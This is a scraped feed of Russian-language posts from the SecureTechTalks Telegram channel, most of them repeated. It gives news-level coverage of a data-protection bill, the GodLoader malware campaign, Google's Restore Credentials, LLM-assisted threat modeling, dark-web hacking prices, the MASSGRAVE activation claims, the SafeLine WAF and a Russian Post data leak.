Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Автомобили #Минпромторг
👍1
⚖ Законотворчество против ИБ: чем грозит новый проект о персональных данных?
🔒 В Госдуме обсуждается законопроект, который вводит уголовную ответственность за незаконный оборот персональных данных. Однако его положения вызывают серьезные вопросы у экспертов по кибербезопасности.
📖 В обновленной редакции законопроекта нет исключений для специалистов, которые занимаются защитой инфраструктуры, расследованием утечек и анализом украденных данных. Это может привести к ситуации, когда действия по расследованию инцидентов и противодействию злоумышленникам окажутся вне закона.
🚨 Согласно документу, ответственность наступает за создание инструментов или платформ для хранения и передачи персональных данных, добытых незаконным путем. Максимальное наказание – до 5 лет лишения свободы или штраф до 700 тысяч рублей.
🛡️ Эксперты отмечают, что усиление контроля может сократить количество нелегальных ресурсов, но полностью проблему не решит. Злоумышленники всё равно сохранят доступ к инструментам для атак.
Что предлагают специалисты?
1. 🔍 Закрепить в законе исключения для компаний, расследующих утечки.
2. ✅ Разрешить анализ украденных данных в рамках противодействия киберпреступникам.
3. 📢 Ввести правовые нормы для мониторинга и уведомления пострадавших.
4. 📑 Прописать критерии и условия работы с утёкшими данными, чтобы действия экспертов оставались в правовом поле.
🚫 Без этих доработок компании могут столкнуться с ограничением своих функций, включая мониторинг даркнета и расследование инцидентов. Это создаст дополнительные риски для всех, особенно для малого и среднего бизнеса, который сильно зависит от ИБ-экспертов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкиданных #законопроект #SecureTechTalks #информационнаябезопасность #персональныеданные
🔒 В Госдуме обсуждается законопроект, который вводит уголовную ответственность за незаконный оборот персональных данных. Однако его положения вызывают серьезные вопросы у экспертов по кибербезопасности.
📖 В обновленной редакции законопроекта нет исключений для специалистов, которые занимаются защитой инфраструктуры, расследованием утечек и анализом украденных данных. Это может привести к ситуации, когда действия по расследованию инцидентов и противодействию злоумышленникам окажутся вне закона.
🚨 Согласно документу, ответственность наступает за создание инструментов или платформ для хранения и передачи персональных данных, добытых незаконным путем. Максимальное наказание – до 5 лет лишения свободы или штраф до 700 тысяч рублей.
🛡️ Эксперты отмечают, что усиление контроля может сократить количество нелегальных ресурсов, но полностью проблему не решит. Злоумышленники всё равно сохранят доступ к инструментам для атак.
Что предлагают специалисты?
1. 🔍 Закрепить в законе исключения для компаний, расследующих утечки.
2. ✅ Разрешить анализ украденных данных в рамках противодействия киберпреступникам.
3. 📢 Ввести правовые нормы для мониторинга и уведомления пострадавших.
4. 📑 Прописать критерии и условия работы с утёкшими данными, чтобы действия экспертов оставались в правовом поле.
🚫 Без этих доработок компании могут столкнуться с ограничением своих функций, включая мониторинг даркнета и расследование инцидентов. Это создаст дополнительные риски для всех, особенно для малого и среднего бизнеса, который сильно зависит от ИБ-экспертов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкиданных #законопроект #SecureTechTalks #информационнаябезопасность #персональныеданные
🔐 Google представляет функцию Restore Credentials для безопасного восстановления доступа к аккаунтам
📱 Упрощение перехода на новое устройство
Google анонсировала функцию Restore Credentials, которая позволит пользователям безопасно восстанавливать доступ к аккаунтам в сторонних приложениях после перехода на новое Android-устройство. Новинка стала частью Credential Manager API и направлена на снижение неудобств, связанных с повторным вводом логинов и паролей после смены телефона.
🔄 Как это работает?
Процесс восстановления выполняется автоматически при переносе данных и приложений с предыдущего устройства. Пользователи смогут мгновенно войти в свои аккаунты без дополнительных действий.
Ключ восстановления: При входе в приложение с поддержкой этой функции на устройстве создаётся ключ восстановления — это публичный ключ, совместимый со стандартами FIDO2, такими как Passkeys.
Шифрование и хранение: Ключ сохраняется в Credential Manager в локальном зашифрованном виде. Если включена облачная резервная копия, ключ может быть дополнительно загружен в облако.
Автоматический вход: При восстановлении данных на новом устройстве Credential Manager автоматически использует ключи восстановления для входа в аккаунты.
👨💻 Рекомендации для разработчиков
Google предлагает разработчикам приложений следующие действия:
1⃣ Генерировать ключ восстановления сразу после успешной аутентификации.
2⃣ Удалять ключ восстановления при выходе пользователя из аккаунта, чтобы избежать автоматического входа, если это не требуется.
🍏 Сравнение с Apple
Apple уже использует схожий механизм через атрибут kSecAttrAccessible в iCloud Keychain. Этот атрибут управляет доступом приложения к учётным данным и поддерживает возможность восстановления только на исходном устройстве или при переходе на новое.
🔒 Безопасность на новом уровне с Android 16
Анонс функции Restore Credentials совпал с выходом первой версии Developer Preview Android 16, которая включает:
- Обновлённый Privacy Dashboard с возможностью отслеживания использования приложениями чувствительных разрешений за последние 7 дней.
- Новые меры защиты, включая Theft Protection, Private Space, Sanitizers и Lockdown Mode, который отключает Smart Lock, биометрическую авторизацию и уведомления на экране блокировки.
Stay secure and read SecureTechTalks 📚
#Android16 #Cybersecurity #FIDO2 #CredentialManager
📱 Упрощение перехода на новое устройство
Google анонсировала функцию Restore Credentials, которая позволит пользователям безопасно восстанавливать доступ к аккаунтам в сторонних приложениях после перехода на новое Android-устройство. Новинка стала частью Credential Manager API и направлена на снижение неудобств, связанных с повторным вводом логинов и паролей после смены телефона.
🔄 Как это работает?
Процесс восстановления выполняется автоматически при переносе данных и приложений с предыдущего устройства. Пользователи смогут мгновенно войти в свои аккаунты без дополнительных действий.
Ключ восстановления: При входе в приложение с поддержкой этой функции на устройстве создаётся ключ восстановления — это публичный ключ, совместимый со стандартами FIDO2, такими как Passkeys.
Шифрование и хранение: Ключ сохраняется в Credential Manager в локальном зашифрованном виде. Если включена облачная резервная копия, ключ может быть дополнительно загружен в облако.
Автоматический вход: При восстановлении данных на новом устройстве Credential Manager автоматически использует ключи восстановления для входа в аккаунты.
👨💻 Рекомендации для разработчиков
Google предлагает разработчикам приложений следующие действия:
1⃣ Генерировать ключ восстановления сразу после успешной аутентификации.
2⃣ Удалять ключ восстановления при выходе пользователя из аккаунта, чтобы избежать автоматического входа, если это не требуется.
🍏 Сравнение с Apple
Apple уже использует схожий механизм через атрибут kSecAttrAccessible в iCloud Keychain. Этот атрибут управляет доступом приложения к учётным данным и поддерживает возможность восстановления только на исходном устройстве или при переходе на новое.
🔒 Безопасность на новом уровне с Android 16
Анонс функции Restore Credentials совпал с выходом первой версии Developer Preview Android 16, которая включает:
- Обновлённый Privacy Dashboard с возможностью отслеживания использования приложениями чувствительных разрешений за последние 7 дней.
- Новые меры защиты, включая Theft Protection, Private Space, Sanitizers и Lockdown Mode, который отключает Smart Lock, биометрическую авторизацию и уведомления на экране блокировки.
Stay secure and read SecureTechTalks 📚
#Android16 #Cybersecurity #FIDO2 #CredentialManager
⚙️ Microsoft Office: прощай конфиденциальность
В функциях Connected Experiences, встроенных в Microsoft Office, произошли изменения. Теперь контент, создаваемый пользователями в приложениях, может быть использован для обучения искусственного интеллекта, если пользователь не отключил эту опцию. На проблему обратил внимание пользователь одной из соцсетей, однако официальных комментариев от Microsoft пока не последовало.
📌 По умолчанию документы, такие как статьи, отчёты и даже личные заметки, могут стать частью набора данных для обучения ИИ. Для защиты своей интеллектуальной собственности и конфиденциальной информации пользователям рекомендуется изменить настройки.
🔍 Как отключить передачу данных?
1⃣ Зайдите в настройки Office.
2⃣ Найдите опцию, связанную с Connected Experiences.
3⃣ Отключите функции, связанные с передачей данных для ИИ.
💡 А что так можно было?
Технологические компании всё чаще используют пользовательские данные для обучения своих моделей. Однако подобный подход вызывает вопросы об этичности использования материалов без явного согласия. Несмотря на это, в пользовательском соглашении Microsoft указано, что компания имеет право обрабатывать контент для улучшения своих продуктов и услуг.
Для тех, кто заботится о безопасности данных, эти изменения — важный сигнал к пересмотру использования облачных и офисных решений.
Stay secure and read SecureTechTalks 📚
#конфиденциальность #ИИ #кибербезопасность #Microsoft #SecureTechTalks
В функциях Connected Experiences, встроенных в Microsoft Office, произошли изменения. Теперь контент, создаваемый пользователями в приложениях, может быть использован для обучения искусственного интеллекта, если пользователь не отключил эту опцию. На проблему обратил внимание пользователь одной из соцсетей, однако официальных комментариев от Microsoft пока не последовало.
📌 По умолчанию документы, такие как статьи, отчёты и даже личные заметки, могут стать частью набора данных для обучения ИИ. Для защиты своей интеллектуальной собственности и конфиденциальной информации пользователям рекомендуется изменить настройки.
🔍 Как отключить передачу данных?
1⃣ Зайдите в настройки Office.
2⃣ Найдите опцию, связанную с Connected Experiences.
3⃣ Отключите функции, связанные с передачей данных для ИИ.
💡 А что так можно было?
Технологические компании всё чаще используют пользовательские данные для обучения своих моделей. Однако подобный подход вызывает вопросы об этичности использования материалов без явного согласия. Несмотря на это, в пользовательском соглашении Microsoft указано, что компания имеет право обрабатывать контент для улучшения своих продуктов и услуг.
Для тех, кто заботится о безопасности данных, эти изменения — важный сигнал к пересмотру использования облачных и офисных решений.
Stay secure and read SecureTechTalks 📚
#конфиденциальность #ИИ #кибербезопасность #Microsoft #SecureTechTalks
🔥1
🎮 Играем не по правилам:
Киберпреступники нашли новый способ доставки вредоносного ПО, используя Godot Engine — популярный open-source игровой движок. С его помощью создан malware-loader GodLoader, который остаётся невидимым для антивирусов и атакует различные платформы, включая Windows, macOS и Linux.
💻 Как работает GodLoader?
1⃣ Вредоносное ПО использует .pck-файлы Godot для распространения заражённых скриптов.
2⃣ Скрипты запускаются через встроенные функции движка, загружая дополнительные вредоносные программы.
3⃣ Преступники применяют язык программирования GDScript для внедрения сложных методов, таких как анти-песочница, анти-VM и удалённая загрузка полезных нагрузок.
🚀 Масштабы атаки:
- Уже инфицировано более 17,000 устройств.
- Злоумышленники нацелены на разработчиков, которые могут случайно интегрировать вредоносный код в свои проекты, а также на геймеров, скачивающих моды и читы.
- Потенциальная аудитория атаки — свыше 1,2 миллиона пользователей игр, созданных на Godot.
🌐 Методы распространения:
GodLoader распространяется через сеть GitHub-аккаунтов, известную как Stargazers Ghost Network. Эта система использует более 200 репозиториев и 225 аккаунтов, чтобы распространять вредоносные программы под видом «взломанного» ПО или генераторов ключей.
🔐 Последствия:
Жертвы скачивали не лицензионное ПО, а загрузчики, которые устанавливали:
- XMRig для скрытого майнинга криптовалют.
- RedLine — инструмент для кражи данных.
🛡 Как защититься?
- Проверяйте репутацию репозиториев и пакетов на GitHub.
- Установите антивирус с поддержкой обнаружения вредоносного ПО в реальном времени.
- Избегайте использования пиратских программ.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #opensource #GodotEngine #SecureTechTalks
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🤖 ThreatModeling-LLM: Автоматизация моделирования угроз для банковской системы
🔐 Автоматизация защиты с помощью ИИ
Моделирование угроз — ключевой элемент кибербезопасности, особенно в банковской сфере, где защита данных клиентов играет первостепенную роль. Однако традиционные подходы требуют значительных усилий специалистов, что снижает эффективность. Новый подход ThreatModeling-LLM использует мощь больших языковых моделей (LLMs) для автоматизации процесса, повышая точность и снижая затраты.
📌 ThreatModeling-LLM работает в три этапа:
1⃣ Создание датасета: Используется Threat Modeling Tool (TMT) для генерации диаграмм потоков данных (DFD) и выявления угроз. Возможно использовать open-source инструменты, такие как OWASP Threat Dragon.
2⃣ Оптимизация запросов (Prompt Engineering): Интеграция методов Chain of Thought (CoT) и Optimization by Prompting (OPRO) улучшает качество ответов ИИ, обеспечивая детальный анализ угроз и их устранение.
3⃣ Тонкая настройка модели (Fine-Tuning): С помощью метода Low-Rank Adaptation (LoRA) модель адаптируется к банковскому контексту, улучшая идентификацию угроз и предложений по их устранению.
🛡 Преимущества:
- Автоматизация: Уменьшение ручного труда и вероятности ошибок.
- Высокая точность: Методы CoT и OPRO повышают точность идентификации угроз с 0.36 до 0.69.
- Соблюдение стандартов: Модель предлагает решения, соответствующие NIST 800-53.
⚠️ Выявленные угрозы:
- Подделка данных транзакций (tampering).
- Угрозы безопасности баз данных (spoofing).
- Нарушения конфиденциальности данных (disclosure).
💡 Подход ThreatModeling-LLM доказывает, что интеграция больших языковых моделей с традиционными инструментами безопасности открывает новые горизонты для автоматизации защиты. Хотя текущий фокус на банковских системах, методика может быть адаптирована для других отраслей, таких как здравоохранение или IoT.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #банковскиесистемы #SecureTechTalks #AI #NIST
🔐 Автоматизация защиты с помощью ИИ
Моделирование угроз — ключевой элемент кибербезопасности, особенно в банковской сфере, где защита данных клиентов играет первостепенную роль. Однако традиционные подходы требуют значительных усилий специалистов, что снижает эффективность. Новый подход ThreatModeling-LLM использует мощь больших языковых моделей (LLMs) для автоматизации процесса, повышая точность и снижая затраты.
📌 ThreatModeling-LLM работает в три этапа:
1⃣ Создание датасета: Используется Threat Modeling Tool (TMT) для генерации диаграмм потоков данных (DFD) и выявления угроз. Возможно использовать open-source инструменты, такие как OWASP Threat Dragon.
2⃣ Оптимизация запросов (Prompt Engineering): Интеграция методов Chain of Thought (CoT) и Optimization by Prompting (OPRO) улучшает качество ответов ИИ, обеспечивая детальный анализ угроз и их устранение.
3⃣ Тонкая настройка модели (Fine-Tuning): С помощью метода Low-Rank Adaptation (LoRA) модель адаптируется к банковскому контексту, улучшая идентификацию угроз и предложений по их устранению.
🛡 Преимущества:
- Автоматизация: Уменьшение ручного труда и вероятности ошибок.
- Высокая точность: Методы CoT и OPRO повышают точность идентификации угроз с 0.36 до 0.69.
- Соблюдение стандартов: Модель предлагает решения, соответствующие NIST 800-53.
⚠️ Выявленные угрозы:
- Подделка данных транзакций (tampering).
- Угрозы безопасности баз данных (spoofing).
- Нарушения конфиденциальности данных (disclosure).
💡 Подход ThreatModeling-LLM доказывает, что интеграция больших языковых моделей с традиционными инструментами безопасности открывает новые горизонты для автоматизации защиты. Хотя текущий фокус на банковских системах, методика может быть адаптирована для других отраслей, таких как здравоохранение или IoT.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #банковскиесистемы #SecureTechTalks #AI #NIST
👍1
🔐 Квантовые вычисления: угроза для блокчейн и криптографии
💡 Прорыв в квантовых технологиях
Microsoft совместно с Atom Computing заявили о прорыве в области квантовых вычислений. Их новая система способна создавать 24 логических кубита, используя всего 80 физических, что на порядок меньше, чем предполагалось ранее, когда для одного логического кубита требовались тысячи физических. Такой прогресс приближает коммерческое применение квантовых технологий.
🔗 Влияние на блокчейн
Сети вроде Bitcoin, использующие алгоритм SHA-256, могут оказаться под угрозой из-за потенциальных возможностей квантовых компьютеров. Алгоритм шифрования, лежащий в основе процесса майнинга, где требуется доказательство выполнения работы (Proof-of-Work), больше не будет считаться криптостойким.
Теоретически, алгоритм Гровера способен ускорить взлом SHA-256 благодаря квадратичному увеличению скорости перебора. Однако, для его применения необходимы сотни или даже тысячи логических кубитов, что пока недостижимо.
📈 Будущее квантового майнинга
Исследования показывают, что системы с 3,000 логических кубитов могут обогнать классические майнинговые фермы. Microsoft и Atom Computing планируют создать 1,000-кубитную систему уже к 2025 году, что ускоряет переход от теории к практике.
⏳ Горизонт реализации
Ожидается, что квантовые компьютеры, способные влиять на блокчейн и криптографию, появятся через 10-50 лет. Пока технологии находятся в стадии развития, но потенциал адаптации алгоритмов шифрования и блокчейнов к квантовым угрозам становится всё более актуальным.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #квантовыекомпьютеры #блокчейн #криптография #биткойн
💡 Прорыв в квантовых технологиях
Microsoft совместно с Atom Computing заявили о прорыве в области квантовых вычислений. Их новая система способна создавать 24 логических кубита, используя всего 80 физических, что на порядок меньше, чем предполагалось ранее, когда для одного логического кубита требовались тысячи физических. Такой прогресс приближает коммерческое применение квантовых технологий.
🔗 Влияние на блокчейн
Сети вроде Bitcoin, использующие алгоритм SHA-256, могут оказаться под угрозой из-за потенциальных возможностей квантовых компьютеров. Алгоритм шифрования, лежащий в основе процесса майнинга, где требуется доказательство выполнения работы (Proof-of-Work), больше не будет считаться криптостойким.
Теоретически, алгоритм Гровера способен ускорить взлом SHA-256 благодаря квадратичному увеличению скорости перебора. Однако, для его применения необходимы сотни или даже тысячи логических кубитов, что пока недостижимо.
📈 Будущее квантового майнинга
Исследования показывают, что системы с 3,000 логических кубитов могут обогнать классические майнинговые фермы. Microsoft и Atom Computing планируют создать 1,000-кубитную систему уже к 2025 году, что ускоряет переход от теории к практике.
⏳ Горизонт реализации
Ожидается, что квантовые компьютеры, способные влиять на блокчейн и криптографию, появятся через 10-50 лет. Пока технологии находятся в стадии развития, но потенциал адаптации алгоритмов шифрования и блокчейнов к квантовым угрозам становится всё более актуальным.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #квантовыекомпьютеры #блокчейн #криптография #биткойн
👍1
🚨 Breaking News: Уголовная ответственность за незаконное использование персональных данных
❗️ В России введены жёсткие меры за нарушение работы с персональными данными, включая уголовное наказание.
📍 Общие меры наказания:
Штраф до 300 тыс. рублей, лишение свободы или принудительные работы сроком до 4 лет.
Если преступление совершено группой лиц или из корыстных побуждений — до 10 лет лишения свободы и штраф до 3 млн рублей.
📍 Данные детей:
За незаконное использование данных детей — штраф до 700 тыс. рублей (или доход за 2 года).
В тяжёлых случаях — до 10 лет тюрьмы и штраф до 3 млн рублей.
📍 Биометрия:
За нарушение в работе с биометрическими данными:
- Для госслужащих — штраф до 300 тыс. рублей.
- Для организаций — штраф до 1 млн рублей.
📍 Медицинские данные:
За утечку медицинских персональных данных штрафы составят до 15 млн рублей.
‼️ Изменения подчеркивают серьёзность отношения государства к защите данных, особенно в условиях роста кибератак и утечек. Компании и организации обязаны пересмотреть свои процессы, чтобы избежать суровых наказаний.
Stay secure and read SecureTechTalks 📚
#персональныеданные #кибербезопасность #SecureTechTalks #законодательство
❗️ В России введены жёсткие меры за нарушение работы с персональными данными, включая уголовное наказание.
📍 Общие меры наказания:
Штраф до 300 тыс. рублей, лишение свободы или принудительные работы сроком до 4 лет.
Если преступление совершено группой лиц или из корыстных побуждений — до 10 лет лишения свободы и штраф до 3 млн рублей.
📍 Данные детей:
За незаконное использование данных детей — штраф до 700 тыс. рублей (или доход за 2 года).
В тяжёлых случаях — до 10 лет тюрьмы и штраф до 3 млн рублей.
📍 Биометрия:
За нарушение в работе с биометрическими данными:
- Для госслужащих — штраф до 300 тыс. рублей.
- Для организаций — штраф до 1 млн рублей.
📍 Медицинские данные:
За утечку медицинских персональных данных штрафы составят до 15 млн рублей.
‼️ Изменения подчеркивают серьёзность отношения государства к защите данных, особенно в условиях роста кибератак и утечек. Компании и организации обязаны пересмотреть свои процессы, чтобы избежать суровых наказаний.
Stay secure and read SecureTechTalks 📚
#персональныеданные #кибербезопасность #SecureTechTalks #законодательство
😱 Сколько стоит кибератака: исследование цен на хакерские услуги в даркнете
🌐 Даркнет — место, где можно заказать практически любой вид кибератаки, от DDoS до взлома социальных сетей. Оплата производится в криптовалюте, что усложняет отслеживание таких операций.
📌 Журналисты из TechRepublic провели исследование цен на такого рода услуги:
1⃣ DDoS-атаки:
- $10 за час атаки.
- До $750 за непрерывную атаку в течение суток на защищённые цели.
2⃣ Взлом сайтов:
Доступ к админ-панели или базе данных стоит около $1200.
3⃣ Взлом аккаунтов соцсетей:
WhatsApp, TikTok, Instagram — от $20 до $500. Сюда также входит шпионаж и кража данных.
4⃣ Атаки на физические лица:
Саботаж, компрометация данных или клевета — $10-$600.
5⃣ Изменение оценок в школах и институтах:
За взлом систем университетов и корректировку оценок — до $1600.
💡 Какие выводы?
Снижение стоимости и рост доступности таких услуг делают угрозы более реальными для компаний и частных лиц.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #даркнет #SecureTechTalks #хакер #безопасность
🌐 Даркнет — место, где можно заказать практически любой вид кибератаки, от DDoS до взлома социальных сетей. Оплата производится в криптовалюте, что усложняет отслеживание таких операций.
📌 Журналисты из TechRepublic провели исследование цен на такого рода услуги:
1⃣ DDoS-атаки:
- $10 за час атаки.
- До $750 за непрерывную атаку в течение суток на защищённые цели.
2⃣ Взлом сайтов:
Доступ к админ-панели или базе данных стоит около $1200.
3⃣ Взлом аккаунтов соцсетей:
WhatsApp, TikTok, Instagram — от $20 до $500. Сюда также входит шпионаж и кража данных.
4⃣ Атаки на физические лица:
Саботаж, компрометация данных или клевета — $10-$600.
5⃣ Изменение оценок в школах и институтах:
За взлом систем университетов и корректировку оценок — до $1600.
💡 Какие выводы?
Снижение стоимости и рост доступности таких услуг делают угрозы более реальными для компаний и частных лиц.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #даркнет #SecureTechTalks #хакер #безопасность
🎨 Pixelator v2: борьба с дипфейками
👩💻 Pixelator v2 — продвинутый инструмент для анализа изображений, который интегрирует RGB-анализ на уровне пикселей, перцептивную релевантность через цветовое пространство CIE-LAB и структурное обнаружение с помощью фильтров Собеля. Он превосходит традиционные методы (MSE, SSIM, LPIPS) по точности и эффективности, выявляя как мелкие изменения пикселей, так и значительные структурные модификации.
🔧 Ключевые особенности:
1⃣ Перцептивный анализ: Использование CIE-LAB для моделирования человеческого восприятия.
2⃣ Структурный контроль: Обнаружение изменений краёв с помощью фильтров Собеля.
3⃣ Высокая производительность: Подходит для задач безопасности и обнаружения дипфейков.
📂 Технические требования:
Python 3.7+
Библиотеки:
NumPy — для численных операций.
OpenCV — для обработки изображений.
scikit-image — для сложных операций с изображениями.
Matplotlib (опционально) — для визуализации результатов.
Установка:
📊 Демонстрация работы:
На примере изображения Lenna (изображение в посте) был изменён зелёный канал RGB всего на 1 пиксель. Изменение незаметно для глаза, но Pixelator v2 успешно зафиксировал эти отклонения, как видно на сравнении с картой SSIM.
💡 Pixelator v2 доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#OpenSource #Дипфейк #АнализИзображений #подделки
👩💻 Pixelator v2 — продвинутый инструмент для анализа изображений, который интегрирует RGB-анализ на уровне пикселей, перцептивную релевантность через цветовое пространство CIE-LAB и структурное обнаружение с помощью фильтров Собеля. Он превосходит традиционные методы (MSE, SSIM, LPIPS) по точности и эффективности, выявляя как мелкие изменения пикселей, так и значительные структурные модификации.
🔧 Ключевые особенности:
1⃣ Перцептивный анализ: Использование CIE-LAB для моделирования человеческого восприятия.
2⃣ Структурный контроль: Обнаружение изменений краёв с помощью фильтров Собеля.
3⃣ Высокая производительность: Подходит для задач безопасности и обнаружения дипфейков.
📂 Технические требования:
Python 3.7+
Библиотеки:
NumPy — для численных операций.
OpenCV — для обработки изображений.
scikit-image — для сложных операций с изображениями.
Matplotlib (опционально) — для визуализации результатов.
Установка:
pip install numpy opencv-python scikit-image matplotlib
📊 Демонстрация работы:
На примере изображения Lenna (изображение в посте) был изменён зелёный канал RGB всего на 1 пиксель. Изменение незаметно для глаза, но Pixelator v2 успешно зафиксировал эти отклонения, как видно на сравнении с картой SSIM.
💡 Pixelator v2 доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#OpenSource #Дипфейк #АнализИзображений #подделки
💥Microsoft Office бесплатно: хакеры наносят удар!
🌟 Группа хакеров MASSGRAVE анонсировала революционный метод обхода систем лицензирования Microsoft Windows и Office. По их словам, инструмент позволяет навсегда активировать любые версии Windows (от 7 до 11), включая серверные издания и расширенные обновления безопасности (ESU). Особенность подхода в том, что он не требует установки стороннего ПО или вмешательства в систему.
🛡 Как работает метод? Хакеры утверждают, что их способ активации абсолютно "чистый" — ни одной модификации системных файлов. В качестве доказательства они опубликовали скриншоты активированных версий Windows с поддержкой ESU.
⚙️ Метод охватывает:
- Windows 7, 8/8.1, 10, 11;
- Серверные версии и их функции;
- ESU для Windows 10 до 2025 года.
Заявленный подход заменяет старые методы активации через HWID (с 2018) и KMS (17 лет), обеспечивая бесплатную безвременную работу с сервисами MS.
⚠️ Если инструмент будет выпущен, это станет серьёзной угрозой для лицензирования Microsoft. Компания может столкнуться с необходимостью пересмотра всей политики защиты своих продуктов.
📢 Когда ожидать?
Решение доступно на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #хакеры #Microsoft #лицензия #SecureTechTalks
🌟 Группа хакеров MASSGRAVE анонсировала революционный метод обхода систем лицензирования Microsoft Windows и Office. По их словам, инструмент позволяет навсегда активировать любые версии Windows (от 7 до 11), включая серверные издания и расширенные обновления безопасности (ESU). Особенность подхода в том, что он не требует установки стороннего ПО или вмешательства в систему.
🛡 Как работает метод? Хакеры утверждают, что их способ активации абсолютно "чистый" — ни одной модификации системных файлов. В качестве доказательства они опубликовали скриншоты активированных версий Windows с поддержкой ESU.
⚙️ Метод охватывает:
- Windows 7, 8/8.1, 10, 11;
- Серверные версии и их функции;
- ESU для Windows 10 до 2025 года.
Заявленный подход заменяет старые методы активации через HWID (с 2018) и KMS (17 лет), обеспечивая бесплатную безвременную работу с сервисами MS.
⚠️ Если инструмент будет выпущен, это станет серьёзной угрозой для лицензирования Microsoft. Компания может столкнуться с необходимостью пересмотра всей политики защиты своих продуктов.
📢 Когда ожидать?
Решение доступно на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #хакеры #Microsoft #лицензия #SecureTechTalks
🛡 SafeLine: инструмент защиты веб-приложений
🌐 SafeLine — Web Application Firewall (WAF) с открытым исходным кодом, предназначенный для защиты веб-приложений от современных угроз. Его разработка ориентирована на нужды малого и среднего бизнеса, предлагая продвинутые функции антибот-защиты и предотвращения DDoS-атак.
✨ Основные функции SafeLine:
🔍 Блокировка атак: Защита от SQL-инъекций, XSS, SSRF, CRLF и других.
🚦 Ограничение трафика: Останавливает HTTP flood, brute-force атаки и резкие скачки нагрузки.
🕹 Антибот-защита: Проверка и блокировка вредоносного ботового трафика.
🔐 Динамическая защита: Шифрование HTML и JavaScript при каждом посещении.
💡 Преимущества SafeLine:
🛠 Гибкость: Полный контроль над политиками безопасности.
💾 Конфиденциальность: Все данные остаются внутри инфраструктуры.
💰 Экономичность: Избавляет от расходов на подписки облачных WAF-решений.
📈 Планы команды:
Команда разработчиков планирует интеграцию функций управления доступом и идентификацией (IAM), чтобы превратить SafeLine в полноценный Web Security Gateway.
📂 Скачать SafeLine: инструмент доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SafeLine #WAF #SecureTechTalks
🌐 SafeLine — Web Application Firewall (WAF) с открытым исходным кодом, предназначенный для защиты веб-приложений от современных угроз. Его разработка ориентирована на нужды малого и среднего бизнеса, предлагая продвинутые функции антибот-защиты и предотвращения DDoS-атак.
✨ Основные функции SafeLine:
🔍 Блокировка атак: Защита от SQL-инъекций, XSS, SSRF, CRLF и других.
🚦 Ограничение трафика: Останавливает HTTP flood, brute-force атаки и резкие скачки нагрузки.
🕹 Антибот-защита: Проверка и блокировка вредоносного ботового трафика.
🔐 Динамическая защита: Шифрование HTML и JavaScript при каждом посещении.
💡 Преимущества SafeLine:
🛠 Гибкость: Полный контроль над политиками безопасности.
💾 Конфиденциальность: Все данные остаются внутри инфраструктуры.
💰 Экономичность: Избавляет от расходов на подписки облачных WAF-решений.
📈 Планы команды:
Команда разработчиков планирует интеграцию функций управления доступом и идентификацией (IAM), чтобы превратить SafeLine в полноценный Web Security Gateway.
📂 Скачать SafeLine: инструмент доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SafeLine #WAF #SecureTechTalks
🗯 VK Security Confab Max: конференция по кибербезопасности
🗓 11 декабря 2024 года в Москве пройдет первая конференция VK Security Confab Max, посвященная практическим аспектам защиты данных. Мероприятие объединит экспертов для обсуждения роста киберугроз, включая социальную инженерию и вредоносное ПО, которые остаются основными инструментами атак.
🎯 Ключевые темы:
- Защита приложений (AppSec)
- Безопасность пользователей
- Защита облаков и инфраструктуры
- Мониторинг и реагирование (SOC)
📌 Участие бесплатное, офлайн и онлайн. Регистрация: VK Confab Max
Stay secure and read SecureTechTalks 📚
#кибербезопасность #конференция #SecureTechTalks
🗓 11 декабря 2024 года в Москве пройдет первая конференция VK Security Confab Max, посвященная практическим аспектам защиты данных. Мероприятие объединит экспертов для обсуждения роста киберугроз, включая социальную инженерию и вредоносное ПО, которые остаются основными инструментами атак.
🎯 Ключевые темы:
- Защита приложений (AppSec)
- Безопасность пользователей
- Защита облаков и инфраструктуры
- Мониторинг и реагирование (SOC)
📌 Участие бесплатное, офлайн и онлайн. Регистрация: VK Confab Max
Stay secure and read SecureTechTalks 📚
#кибербезопасность #конференция #SecureTechTalks
📩 Данные почтой: утечка данных «Почты России»
📦 «Почта России» начала внутренний аудит информационных систем после сообщений об утечке базы данных корпоративных отправлений. Утечка включает более 26 миллионов строк, содержащих:
- ФИО отправителей и получателей, телефоны и адреса;
- Данные о трек-номерах, весе, стоимости отправлений;
- Время доставки и другую техническую информацию.
🔍 Реакция компании:
В «Почте России» заявили, что анализируют, связана ли утечка с ранее зафиксированным инцидентом 2022 года. Однако эксперты DLBI утверждают, что опубликованные данные актуальны на 2024 год, подтверждая это выборочной проверкой информации на сайте компании.
⚠️ Возможные риски:
1⃣ Использование утёкших данных для фишинга и мошеннических схем.
2⃣ Доступ к данным клиентов через компрометированные учётные записи.
🛡 Что делается для защиты?
Компания усилила мониторинг и защиту точек доступа к личной информации. Роскомнадзор также запросил дополнительные сведения о произошедшем инциденте.
📈 Что нужно знать:
- Утечки данных становятся регулярной проблемой, что требует усиленного контроля за безопасностью.
- Пострадавшие пользователи имеют право требовать компенсации, однако судебная практика в этой сфере пока ограничена.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкаданных #SecureTechTalks
#почта #dataleak
📦 «Почта России» начала внутренний аудит информационных систем после сообщений об утечке базы данных корпоративных отправлений. Утечка включает более 26 миллионов строк, содержащих:
- ФИО отправителей и получателей, телефоны и адреса;
- Данные о трек-номерах, весе, стоимости отправлений;
- Время доставки и другую техническую информацию.
🔍 Реакция компании:
В «Почте России» заявили, что анализируют, связана ли утечка с ранее зафиксированным инцидентом 2022 года. Однако эксперты DLBI утверждают, что опубликованные данные актуальны на 2024 год, подтверждая это выборочной проверкой информации на сайте компании.
⚠️ Возможные риски:
1⃣ Использование утёкших данных для фишинга и мошеннических схем.
2⃣ Доступ к данным клиентов через компрометированные учётные записи.
🛡 Что делается для защиты?
